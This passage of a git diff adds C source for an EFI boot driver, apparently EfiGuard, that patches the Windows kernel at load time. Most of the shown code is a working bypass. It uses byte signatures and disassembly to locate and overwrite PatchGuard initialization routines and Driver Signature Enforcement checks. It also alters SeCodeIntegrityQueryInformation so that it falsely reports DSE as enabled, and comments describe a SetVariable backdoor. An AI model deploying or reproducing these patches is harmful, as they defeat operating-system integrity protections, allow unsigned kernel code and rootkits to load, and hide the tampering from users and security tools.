reboot.\r\n"); + if (!WaitForKey()) + { + gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL); + } + } + else + { + Print(L"Successfully patched %S!%S.\r\n", ShortFileName, FunctionName); + RtlSleep(2000); + + if (gDriverConfig.WaitForKeyPress) + { + Print(L"\r\nPress any key to continue.\r\n"); + WaitForKey(); + } + } + + // Return success, because even if the patch failed, the user chose not to reboot above + return EFI_SUCCESS; +} diff --git a/EfiGuardDxe/PatchNtoskrnl.c b/EfiGuardDxe/PatchNtoskrnl.c new file mode 100644 index 0000000..b5d34f6 --- /dev/null +++ b/EfiGuardDxe/PatchNtoskrnl.c @@ -0,0 +1,661 @@ +#include "EfiGuardDxe.h" + +#include <Library/BaseMemoryLib.h> + + +// Global kernel patch status information. +// +// The justification for statically allocating these ~8KB is that this buffer will be accessible during both contexts of winload.efi. Winload has two +// runtime contexts: the real mode firmware context (= 1), in which EFI services are accessible, and the protected mode application context (= 0), +// which has its own GDT, IDT and paging levels and which is used to set up the NT environment and enable virtual addressing. Winload switches between +// the two with BlpArchSwitchContext() when needed. Because we cannot allocate memory in protected mode (e.g. in PatchNtoskrnl), and any memory +// allocated in real mode (e.g. in PatchWinload) will need address translation on later access, this is by far the simplest solution +// because it allows the buffer to be accessed from both contexts at all stages of driver execution. +KERNEL_PATCH_INFORMATION gKernelPatchInfo; + + +// Signature for ntoskrnl!KeInitAmd64SpecificState +// This function is present in all x64 kernels since Vista. It generates a #DE due to 32 bit idiv quotient overflow. +STATIC CONST UINT8 SigKeInitAmd64SpecificState[] = { + 0xF7, 0xD9, // neg ecx + 0x45, 0x1B, 0xC0, // sbb r8d, r8d + 0x41, 0x83, 0xE0, 0xEE, // and r8d, 0FFFFFFEEh + 0x41, 0x83, 0xC0, 0x11, // add r8d, 11h + 0xD1, 0xCA, // ror edx, 1 + 0x8B, 0xC2, // mov eax, edx + 0x99, // cdq + 0x41, 0xF7, 0xF8 // idiv r8d +}; + +// Signature for SeCodeIntegrityQueryInformation, called through NtQuerySystemInformation(SystemCodeIntegrityInformation). +// This function has actually existed since Vista in various forms, sometimes (8/8.1/early 10) inlined in ExpQuerySystemInformation. +// This signature is only for the Windows 10 RS3+ version. I could add more signatures but this is a pretty superficial patch anyway. +STATIC CONST UINT8 SigSeCodeIntegrityQueryInformation[] = { + 0x48, 0x83, 0xEC, // sub rsp, XX + 0xCC, 0x48, 0x83, 0x3D, 0xCC, 0xCC, 0xCC, 0xCC, 0x00, // cmp cs:qword_14035E638, 0 + 0x4D, 0x8B, 0xC8, // mov r9, r8 + 0x4C, 0x8B, 0xD1, // mov r10, rcx + 0x74, 0xCC, // jz XX + 0x8A, 0x05, 0xCC, 0xCC, 0xCC, 0xCC, // mov al, cs:SeILSigningPolicy + 0x0F, 0xB6, 0xC8, // movzx ecx, al + 0x84, 0xC0, // test al, al + 0x75, 0xCC, // jnz XX + 0x0F, 0xB6, 0x0D, 0xCC, 0xCC, 0xCC, 0xCC // movzx ecx, cs:SeILSigningPolicyRuntime +}; + +// Patched SeCodeIntegrityQueryInformation which reports that DSE is enabled +STATIC CONST UINT8 SeCodeIntegrityQueryInformationPatch[] = { + 0x41, 0xC7, 0x00, 0x08, 0x00, 0x00, 0x00, // mov dword ptr [r8], 8 + 0x33, 0xC0, // xor eax, eax + 0xC7, 0x41, 0x04, 0x01, 0x00, 0x00, 0x00, // mov dword ptr [rcx+4], 1 + 0xC3 // ret +}; + + +// +// Defuses PatchGuard initialization routines before execution is transferred to the kernel. +// All code accessed here is located in the INIT section. +// +STATIC +EFI_STATUS +EFIAPI +DisablePatchGuard( + IN UINT8* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN PEFI_IMAGE_SECTION_HEADER InitSection, + IN UINT16 BuildNumber + ) +{ + CONST UINT32 StartRva = InitSection->VirtualAddress; + CONST UINT32 SizeOfRawData = InitSection->SizeOfRawData; + CONST UINT8* StartVa = ImageBase + StartRva; + + // Search for KeInitAmd64SpecificState + PRINT_KERNEL_PATCH_MSG(L"\r\n== Searching for nt!KeInitAmd64SpecificState pattern in INIT ==\r\n"); + UINT8* KeInitAmd64SpecificStatePatternAddress = NULL; + for (UINT8* Address = (UINT8*)StartVa; Address < StartVa + SizeOfRawData - sizeof(SigKeInitAmd64SpecificState); ++Address) + { + if (CompareMem(Address, SigKeInitAmd64SpecificState, sizeof(SigKeInitAmd64SpecificState)) == 0) + { + KeInitAmd64SpecificStatePatternAddress = Address; + PRINT_KERNEL_PATCH_MSG(L" Found KeInitAmd64SpecificState pattern at 0x%llX.\r\n", (UINTN)KeInitAmd64SpecificStatePatternAddress); + break; + } + } + + // Backtrack to function start + UINT8* KeInitAmd64SpecificState = BacktrackToFunctionStart(KeInitAmd64SpecificStatePatternAddress, + (UINT8*)(KeInitAmd64SpecificStatePatternAddress - StartVa)); + if (KeInitAmd64SpecificState == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find KeInitAmd64SpecificState%S.\r\n", + (KeInitAmd64SpecificStatePatternAddress == NULL ? L" pattern" : L"")); + return EFI_NOT_FOUND; + } + + // Search for CcInitializeBcbProfiler (Win 8+) / <HUGEFUNC> (Win Vista/7) + // Most variables below use the 'CcInitializeBcbProfiler' name, which is not really accurate for Windows Vista/7 but close enough. + // For debug prints, call the function "<HUGEFUNC>" instead if we're on Windows Vista/7. (seriously, it's fucking huge) + CONST CHAR16* FuncName = BuildNumber >= 9200 ? L"CcInitializeBcbProfiler" : L"<HUGEFUNC>"; + PRINT_KERNEL_PATCH_MSG(L"== Disassembling INIT to find nt!%S ==\r\n", FuncName); + UINT8* CcInitializeBcbProfilerPatternAddress = NULL; + + // On Windows Vista/7 we need to find the address of RtlPcToFileHeader, which will help identify HUGEFUNC as no other function calls this + UINTN RtlPcToFileHeader = 0; + if (BuildNumber < 9200) + { + RtlPcToFileHeader = (UINTN)GetProcedureAddress((UINTN)ImageBase, NtHeaders, "RtlPcToFileHeader"); + if (RtlPcToFileHeader == 0) + { + PRINT_KERNEL_PATCH_MSG(L"Failed to find RtlPcToFileHeader export.\r\n"); + return EFI_NOT_FOUND; + } + } + + // Initialize Zydis + ZydisDecoder Decoder; + ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL); + if (!ZYAN_SUCCESS(Status)) + { + PRINT_KERNEL_PATCH_MSG(L"Failed to initialize disassembler engine.\r\n"); + return EFI_LOAD_ERROR; + } + + CONST UINTN Length = SizeOfRawData; + UINTN Offset = 0; + ZyanU64 InstructionAddress; + ZydisDecodedInstruction Instruction; + + // Start decode loop + while ((InstructionAddress = (ZyanU64)(StartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + if (BuildNumber < 9200) + { + // Windows Vista/7: check if this is 'call IMM' + if (Instruction.operand_count == 4 && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[0].imm.is_relative == ZYAN_TRUE && + Instruction.mnemonic == ZYDIS_MNEMONIC_CALL) + { + // Check if this is 'call RtlPcToFileHeader' + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) && + OperandAddress == RtlPcToFileHeader) + { + CcInitializeBcbProfilerPatternAddress = (UINT8*)InstructionAddress; + PRINT_KERNEL_PATCH_MSG(L" Found 'call RtlPcToFileHeader' at 0x%llX.\r\n", (UINTN)CcInitializeBcbProfilerPatternAddress); + break; + } + } + } + else + { + // Windows 8+: check if this is 'mov [al|rax], 0x0FFFFF780000002D4' ; SharedUserData->KdDebuggerEnabled + if ((Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV && Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER) && + ((Instruction.operands[0].reg.value == ZYDIS_REGISTER_AL && Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY && + (UINT64)(Instruction.operands[1].mem.disp.value) == 0x0FFFFF780000002D4ULL) || + (Instruction.operands[0].reg.value == ZYDIS_REGISTER_RAX && Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && + Instruction.operands[1].imm.value.u == 0x0FFFFF780000002D4ULL))) + { + CcInitializeBcbProfilerPatternAddress = (UINT8*)InstructionAddress; + PRINT_KERNEL_PATCH_MSG(L" Found CcInitializeBcbProfiler pattern at 0x%llX.\r\n", (UINTN)CcInitializeBcbProfilerPatternAddress); + break; + } + } + + Offset += Instruction.length; + } + + // Backtrack to function start + UINT8* CcInitializeBcbProfiler = BacktrackToFunctionStart(CcInitializeBcbProfilerPatternAddress, + (UINT8*)(CcInitializeBcbProfilerPatternAddress - StartVa)); + if (CcInitializeBcbProfiler == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find %S%S.\r\n", + FuncName, (CcInitializeBcbProfilerPatternAddress == NULL ? L" pattern" : L"")); + return EFI_NOT_FOUND; + } + + // Search for ExpLicenseWatchInitWorker (only exists on Windows >= 8) + UINT8* ExpLicenseWatchInitWorker = NULL; + if (BuildNumber >= 9200) + { + PRINT_KERNEL_PATCH_MSG(L"== Disassembling INIT to find nt!ExpLicenseWatchInitWorker ==\r\n"); + UINT8* ExpLicenseWatchInitWorkerPatternAddress = NULL; + + // Start decode loop + Offset = 0; + while ((InstructionAddress = (ZyanU64)(StartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is 'mov al, ds:[0x0FFFFF780000002D4]' ; SharedUserData->KdDebuggerEnabled + // The address must also obviously not be the CcInitializeBcbProfiler one we just found + if ((UINT8*)InstructionAddress != CcInitializeBcbProfilerPatternAddress && + Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[0].reg.value == ZYDIS_REGISTER_AL && + Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[1].mem.segment == ZYDIS_REGISTER_DS && + Instruction.operands[1].mem.disp.value == 0x0FFFFF780000002D4LL) + { + ExpLicenseWatchInitWorkerPatternAddress = (UINT8*)InstructionAddress; + PRINT_KERNEL_PATCH_MSG(L" Found ExpLicenseWatchInitWorker pattern at 0x%llX.\r\n", (UINTN)ExpLicenseWatchInitWorkerPatternAddress); + break; + } + + Offset += Instruction.length; + } + + // Backtrack to function start + ExpLicenseWatchInitWorker = BacktrackToFunctionStart(ExpLicenseWatchInitWorkerPatternAddress, + (UINT8*)(ExpLicenseWatchInitWorkerPatternAddress - StartVa)); + if (ExpLicenseWatchInitWorker == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find ExpLicenseWatchInitWorker%S.\r\n", + (ExpLicenseWatchInitWorkerPatternAddress == NULL ? L" pattern" : L"")); + return EFI_NOT_FOUND; + } + } + + // We have all the addresses we need; now do the actual patching. + CONST UINT32 Yes = 0xC301B0; // mov al, 1, ret + CONST UINT32 No = 0xC3C033; // xor eax, eax, ret + *((UINT32*)KeInitAmd64SpecificState) = No; + *((UINT32*)CcInitializeBcbProfiler) = Yes; + if (ExpLicenseWatchInitWorker != NULL) + *((UINT32*)ExpLicenseWatchInitWorker) = No; + + // Print info + PRINT_KERNEL_PATCH_MSG(L"\r\n Patched KeInitAmd64SpecificState [RVA: 0x%X].\r\n", + (UINT32)(KeInitAmd64SpecificState - ImageBase)); + PRINT_KERNEL_PATCH_MSG(L" Patched %S [RVA: 0x%X].\r\n", + FuncName, (UINT32)(CcInitializeBcbProfiler - ImageBase)); + if (ExpLicenseWatchInitWorker != NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Patched ExpLicenseWatchInitWorker [RVA: 0x%X].\r\n", + (UINT32)(ExpLicenseWatchInitWorker - ImageBase)); + } + + return EFI_SUCCESS; +} + +// +// Disables DSE for the duration of the boot by preventing it from initializing. +// This function is only called if DseBypassMethod is DSE_DISABLE_AT_BOOT, or if the Windows version is Vista or 7 +// and DseBypassMethod is DSE_DISABLE_SETVARIABLE_HOOK. In the latter case, only one byte is patched to make +// the SetVariable backdoor safe to use more than once. DSE will still be fully initialized in this case. +// All code accessed here is located in the PAGE section. +// +STATIC +EFI_STATUS +DisableDSE( + IN UINT8* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN PEFI_IMAGE_SECTION_HEADER PageSection, + IN EFIGUARD_DSE_BYPASS_TYPE BypassType, + IN UINT16 BuildNumber + ) +{ + if (BypassType == DSE_DISABLE_NONE) + return EFI_INVALID_PARAMETER; + + CONST UINT32 PageSizeOfRawData = PageSection->SizeOfRawData; + CONST UINT8* PageStartVa = ImageBase + PageSection->VirtualAddress; + + // Find the ntoskrnl.exe IAT address for CI.dll!CiInitialize + VOID* CiInitialize; + CONST EFI_STATUS IatStatus = FindIATAddressForImport(ImageBase, + NtHeaders, + "CI.dll", + "CiInitialize", + &CiInitialize); + if (EFI_ERROR(IatStatus)) + { + PRINT_KERNEL_PATCH_MSG(L"Failed to find IAT address of CI.dll!CiInitialize.\r\n"); + return IatStatus; + } + + PRINT_KERNEL_PATCH_MSG(L"\r\n== Disassembling PAGE to find nt!SepInitializeCodeIntegrity 'mov ecx, xxx' ==\r\n"); + + // Initialize Zydis + ZydisDecoder Decoder; + ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL); + if (!ZYAN_SUCCESS(Status)) + { + PRINT_KERNEL_PATCH_MSG(L"Failed to initialize disassembler engine.\r\n"); + return EFI_LOAD_ERROR; + } + + UINT8* SepInitializeCodeIntegrityMovEcxAddress = NULL; + UINTN Length, Offset; + ZyanU64 InstructionAddress; + ZydisDecodedInstruction Instruction; + + if (BuildNumber < 9200) + { + // On Windows Vista/7 we have an enormously annoying import thunk in .text to find. All it does is 'jmp __imp_CiInitialize'. + // SepInitializeCodeIntegrity will then call this thunk. What a waste + CONST PEFI_IMAGE_SECTION_HEADER TextSection = IMAGE_FIRST_SECTION(NtHeaders); + VOID* JmpCiInitializeAddress = NULL; + Length = TextSection->SizeOfRawData; + Offset = 0; + + // Start decode loop + while ((InstructionAddress = (ZyanU64)(ImageBase + TextSection->VirtualAddress + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + if ((Instruction.operand_count == 2 && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP) && + Instruction.mnemonic == ZYDIS_MNEMONIC_JMP) + { + // Check if this is 'jmp qword ptr ds:[CiInitialize IAT RVA]' + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) && + OperandAddress == (UINTN)CiInitialize) + { + JmpCiInitializeAddress = (VOID*)InstructionAddress; + break; + } + } + + Offset += Instruction.length; + } + + if (JmpCiInitializeAddress == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find 'jmp __imp_CiInitialize' import thunk.\r\n"); + return EFI_NOT_FOUND; + } + + // Make this the new 'IAT address' to simplify checks below + CiInitialize = JmpCiInitializeAddress; + } + + UINT8* LastMovIntoEcx = NULL; // Keep track of 'mov ecx, xxx' - the last one before call/jmp cs:__imp_CiInitialize is the one we want to patch + Length = PageSizeOfRawData; + Offset = 0; + + // Start decode loop + while ((InstructionAddress = (ZyanU64)(PageStartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is a 2-byte (size of our patch) 'mov ecx, <anything>' and store the instruction address if so + if (Instruction.operand_count == 2 && Instruction.length == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[0].reg.value == ZYDIS_REGISTER_ECX) + { + LastMovIntoEcx = (UINT8*)InstructionAddress; + } + else if ((BuildNumber >= 9200 && + ((Instruction.operand_count == 2 || Instruction.operand_count == 4) && + (Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP) && + ((Instruction.mnemonic == ZYDIS_MNEMONIC_JMP && Instruction.operand_count == 2) || + (Instruction.mnemonic == ZYDIS_MNEMONIC_CALL && Instruction.operand_count == 4)))) + || + (BuildNumber < 9200 && + (Instruction.operand_count == 4 && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[0].imm.is_relative == ZYAN_TRUE && + Instruction.mnemonic == ZYDIS_MNEMONIC_CALL))) + { + // Check if this is + // 'call IMM:CiInitialize thunk' // E8 ?? ?? ?? ?? // Windows Vista/7 + // or + // 'jmp qword ptr ds:[CiInitialize IAT RVA]' // 48 FF 25 ?? ?? ?? ?? // Windows 8 through 10.0.15063.0 + // or + // 'call qword ptr ds:[CiInitialize IAT RVA]' // FF 15 ?? ?? ?? ?? // Windows 10.0.16299.0+ + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) && + OperandAddress == (UINTN)CiInitialize) + { + SepInitializeCodeIntegrityMovEcxAddress = LastMovIntoEcx; // The last 'mov ecx, xxx' before the call/jmp is the instruction we want + PRINT_KERNEL_PATCH_MSG(L" Found 'mov ecx, xxx' in SepInitializeCodeIntegrity [RVA: 0x%X].\r\n", + (UINT32)(SepInitializeCodeIntegrityMovEcxAddress - ImageBase)); + break; + } + } + + Offset += Instruction.length; + } + + if (SepInitializeCodeIntegrityMovEcxAddress == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find SepInitializeCodeIntegrity 'mov ecx, xxx' pattern.\r\n"); + return EFI_NOT_FOUND; + } + + UINTN gCiEnabled = 0; + if (BuildNumber < 9200) + { + // On Windows Vista/7, find g_CiEnabled now because it's a few bytes away and we'll it need later + Length = 32; + Offset = 0; + + while ((InstructionAddress = (ZyanU64)(SepInitializeCodeIntegrityMovEcxAddress + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is 'mov g_CiEnabled, REG8' + if (Instruction.operand_count == 2 && + Instruction.mnemonic == ZYDIS_MNEMONIC_MOV && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP && + Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_REGISTER) + { + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, (ZyanU64*)&gCiEnabled))) + { + PRINT_KERNEL_PATCH_MSG(L" Found g_CiEnabled at 0x%llX.\r\n", gCiEnabled); + break; + } + } + + Offset += Instruction.length; + } + + if (gCiEnabled == 0) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find g_CiEnabled.\r\n"); + return EFI_NOT_FOUND; + } + } + + PRINT_KERNEL_PATCH_MSG(L"== Disassembling PAGE to find nt!SeValidateImageData '%S' ==\r\n", + (BuildNumber >= 9200 ? L"mov eax, 0xC0000428" : L"cmp g_CiEnabled, al")); + UINT8 *SeValidateImageDataMovEaxAddress = NULL, *SeValidateImageDataJzAddress = NULL; + + // Start decode loop + Length = PageSizeOfRawData; + Offset = 0; + while ((InstructionAddress = (ZyanU64)(PageStartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // On Windows >= 8, check if this is 'mov eax, 0xC0000428' (STATUS_INVALID_IMAGE_HASH) in SeValidateImageData + if ((BuildNumber >= 9200 && + (Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV) && + (Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[0].reg.value == ZYDIS_REGISTER_EAX) && + Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[1].imm.value.s == 0xc0000428LL)) + { + // Exclude false positives: next instruction must be jmp rel32 (Win 8), jmp rel8 (Win 8.1/10) or ret + CONST UINT8* Address = (UINT8*)InstructionAddress; + CONST UINT8 JmpOpcode = BuildNumber >= 9600 ? 0xEB : 0xE9; + if (*(Address + Instruction.length) == JmpOpcode || *(Address + Instruction.length) == 0xC3) + { + SeValidateImageDataMovEaxAddress = (UINT8*)Address; + PRINT_KERNEL_PATCH_MSG(L" Found 'mov eax, 0xC0000428' in SeValidateImageData [RVA: 0x%X].\r\n", + (UINT32)(SeValidateImageDataMovEaxAddress - ImageBase)); + break; + } + } + // On Windows Vista/7, check if this is 'cmp g_CiEnabled, al' in SeValidateImageData + else if (BuildNumber < 9200 && + (Instruction.operand_count == 3 && Instruction.mnemonic == ZYDIS_MNEMONIC_CMP) && + (Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP) && + (Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[1].reg.value == ZYDIS_REGISTER_AL)) + { + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) && + OperandAddress == gCiEnabled) + { + // Verify the next instruction is jz, and store its address instead of the cmp, as we will be patching the jz + CONST UINT8* Address = (UINT8*)InstructionAddress; + if (*(Address + Instruction.length) == 0x74) + { + SeValidateImageDataJzAddress = (UINT8*)(Address + Instruction.length); + PRINT_KERNEL_PATCH_MSG(L" Found 'cmp g_CiEnabled, al' in SeValidateImageData [RVA: 0x%X].\r\n", + (UINT32)(Address - ImageBase)); + break; + } + } + } + + Offset += Instruction.length; + } + + if (SeValidateImageDataMovEaxAddress == NULL && SeValidateImageDataJzAddress == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find SeValidateImageData '%S' pattern.\r\n", + (BuildNumber >= 9200 ? L"mov eax, 0xC0000428" : L"cmp g_CiEnabled, al")); + return EFI_NOT_FOUND; + } + + // We have all the addresses we need; now do the actual patching. + // SepInitializeCodeIntegrity is only patched when using the 'nuke option' DSE_DISABLE_AT_BOOT. + if (BypassType == DSE_DISABLE_AT_BOOT) + *((UINT16*)SepInitializeCodeIntegrityMovEcxAddress) = 0xC931; // xor ecx, ecx + + // SeValidateImageData *must* be patched on Windows Vista and 7 regardless of the DSE bypass method. + // On Windows >= 8, again require DSE_DISABLE_AT_BOOT to do anything as it is otherwise harmless. + if (BuildNumber < 9200) + *SeValidateImageDataJzAddress = 0xEB; // jmp + else if (BypassType == DSE_DISABLE_AT_BOOT) + *(UINT32*)((UINT8*)SeValidateImageDataMovEaxAddress + 1 /*skip existing mov opcode*/) = 0x0; // mov eax, 0 + + if (BuildNumber >= 16299 && BypassType == DSE_DISABLE_AT_BOOT) + { + // We are on RS3 or higher. If we can find and patch SeCodeIntegrityQueryInformation, great. + // But DSE has been disabled at this point, so success will be returned regardless. + UINT8* Found = NULL; + CONST EFI_STATUS CiStatus = FindPattern(SigSeCodeIntegrityQueryInformation, + 0xCC, + sizeof(SigSeCodeIntegrityQueryInformation), + (VOID*)PageStartVa, // SeCodeIntegrityQueryInformation is in PAGE, so start there + PageSizeOfRawData, + (VOID**)&Found); + if (EFI_ERROR(CiStatus)) + { + PRINT_KERNEL_PATCH_MSG(L"\r\nFailed to find SeCodeIntegrityQueryInformation. Skipping patch.\r\n"); + } + else + { + CopyMem((VOID*)Found, (VOID*)SeCodeIntegrityQueryInformationPatch, sizeof(SeCodeIntegrityQueryInformationPatch)); + PRINT_KERNEL_PATCH_MSG(L"\r\nPatched SeCodeIntegrityQueryInformation [RVA: 0x%X].\r\n", (UINT32)(Found - ImageBase)); + } + } + + return EFI_SUCCESS; +} + +// +// Patches ntoskrnl.exe +// +EFI_STATUS +EFIAPI +PatchNtoskrnl( + IN VOID* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders + ) +{ + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] ntoskrnl.exe at 0x%llX, size 0x%llX\r\n", (UINTN)ImageBase, (UINTN)NtHeaders->OptionalHeader.SizeOfImage); + + // Print file and version info + UINT16 MajorVersion = 0, MinorVersion = 0, BuildNumber = 0, Revision = 0; + UINT32 FileFlags = 0; + EFI_STATUS Status = GetPeFileVersionInfo((VOID*)ImageBase, &MajorVersion, &MinorVersion, &BuildNumber, &Revision, &FileFlags); + if (EFI_ERROR(Status)) + { + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] WARNING: failed to obtain ntoskrnl.exe version info. Status: %llx\r\n", Status); + } + else + { + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] Patching ntoskrnl.exe v%u.%u.%u.%u...\r\n", MajorVersion, MinorVersion, BuildNumber, Revision); + + // Check if this is a supported kernel version. All versions after Vista SP1 should be supported. + // There is no "maximum allowed" version; e.g. 10.1, 11.0... are OK. Windows 10 is a whole three major versions higher than Windows 7, + // and the only real changes were an added spyware bundle and the removal of the classic theme. Seriously, fuck whoever did that + if (BuildNumber < 6001) + { + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] ERROR: Unsupported kernel image version.\r\n"); + return EFI_UNSUPPORTED; + } + + if ((FileFlags & VS_FF_DEBUG) != 0) + { + // Do not patch checked kernels. There is too much difference in PG and DSE initialization code due to missing optimizations. + // This is a moot point anyway because MS has stopped releasing checked OS builds or even kernels to common plebs (i.e. not Intel or Nvidia) + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] ERROR: Checked kernels are not supported.\r\n"); + return EFI_UNSUPPORTED; + } + } + + // Find the INIT and PAGE sections + PEFI_IMAGE_SECTION_HEADER InitSection = NULL, PageSection = NULL; + PEFI_IMAGE_SECTION_HEADER Section = IMAGE_FIRST_SECTION(NtHeaders); + for (UINT16 i = 0; i < NtHeaders->FileHeader.NumberOfSections; ++i) + { + CHAR8 SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME + 1]; + CopyMem(SectionName, Section->Name, EFI_IMAGE_SIZEOF_SHORT_NAME); + SectionName[MAX(sizeof("PAGE"), sizeof("INIT"))] = '\0'; // Null terminate so we don't match lookalikes like INITDATA and PAGEVRFY + + if (AsciiStrCmp(SectionName, "INIT") == 0) + InitSection = Section; + else if (AsciiStrCmp(SectionName, "PAGE") == 0) + PageSection = Section; + + Section++; + } + + ASSERT(InitSection != NULL); + ASSERT(PageSection != NULL); + + // Patch INIT section to disable PatchGuard + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] Disabling PatchGuard... [INIT RVA: 0x%X - 0x%X]\r\n", + InitSection->VirtualAddress, InitSection->VirtualAddress + InitSection->SizeOfRawData); + Status = DisablePatchGuard((UINT8*)ImageBase, + NtHeaders, + InitSection, + BuildNumber); + if (EFI_ERROR(Status)) + goto Exit; + + PRINT_KERNEL_PATCH_MSG(L"\r\n[PatchNtoskrnl] Successfully disabled PatchGuard.\r\n"); + + if (gDriverConfig.DseBypassMethod == DSE_DISABLE_AT_BOOT || + (BuildNumber < 9200 && gDriverConfig.DseBypassMethod != DSE_DISABLE_NONE)) + { + // Patch PAGE section to disable DSE at boot, or (on Windows Vista/7) to allow the SetVariable hook to be safely used more than once + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] %S... [PAGE RVA: 0x%X - 0x%X]\r\n", + gDriverConfig.DseBypassMethod == DSE_DISABLE_AT_BOOT ? L"Disabling DSE" : L"Ensuring safe DSE bypass", + PageSection->VirtualAddress, PageSection->VirtualAddress + PageSection->SizeOfRawData); + Status = DisableDSE((UINT8*)ImageBase, + NtHeaders, + PageSection, + gDriverConfig.DseBypassMethod, + BuildNumber); + if (EFI_ERROR(Status)) + goto Exit; + + if (gDriverConfig.DseBypassMethod == DSE_DISABLE_AT_BOOT) + PRINT_KERNEL_PATCH_MSG(L"\r\n[PatchNtoskrnl] Successfully disabled DSE.\r\n"); + } + +Exit: + return Status; +} diff --git a/EfiGuardDxe/PatchWinload.c b/EfiGuardDxe/PatchWinload.c new file mode 100644 index 0000000..1a37de4 --- /dev/null +++ b/EfiGuardDxe/PatchWinload.c @@ -0,0 +1,683 @@ +#include "EfiGuardDxe.h" + +#include <Guid/Acpi.h> +#include <Library/BaseMemoryLib.h> + +t_OslFwpKernelSetupPhase1 gOriginalOslFwpKernelSetupPhase1 = NULL; +UINT8 gOslFwpKernelSetupPhase1Backup[sizeof(gHookTemplate)] = { 0 }; + + +// Signature for winload!OslFwpKernelSetupPhase1+XX, where the value of XX needs to be determined by backtracking. +// Windows 10 only. On older OSes, and on Windows 10 as fallback, OslFwpKernelSetupPhase1 is found via 